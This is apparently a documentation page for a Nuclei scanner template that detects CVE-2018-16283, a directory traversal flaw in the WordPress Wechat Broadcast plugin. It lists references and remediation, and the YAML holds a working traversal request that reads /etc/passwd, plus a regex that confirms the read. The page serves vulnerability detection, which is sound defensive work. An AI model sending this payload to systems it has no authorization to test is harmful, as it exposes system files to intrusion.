WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
ID: CVE-2018-16283
Severity: critical
Author: 0x240x23elu
Tags: cve,cve2018,edb,seclists,wordpress,wp-plugin,lfi,wechat_brodcast_project
Description
Section titled “Description”WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.
YAML Source
Section titled “YAML Source”id: CVE-2018-16283
info: name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion author: 0x240x23elu severity: critical description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter. remediation: | Update to the latest version of the WordPress Plugin Wechat Broadcast or apply the patch provided by the vendor to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/45438 - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - https://github.com/springjk/wordpress-wechat-broadcast/issues/14 - http://seclists.org/fulldisclosure/2018/Sep/32 - https://exchange.xforce.ibmcloud.com/vulnerabilities/150202 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 epss-score: 0.25721 epss-percentile: 0.96702 cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: wechat_brodcast_project product: wechat_brodcast framework: wordpress tags: cve,cve2018,edb,seclists,wordpress,wp-plugin,lfi,wechat_brodcast_project
http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"
matchers: - type: regex part: body regex: - "root:.*:0:0:"# digest: 4a0a00473045022100cbc63627b287f28ef53de241ac904ce5cc4afb2da63e18f8b0cf5a11d4bc10e2022027b0097d141a62e2af99aeb39fcfc7410eb9d49442159d79ac99e1c4e7e8e456:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-16283.yaml"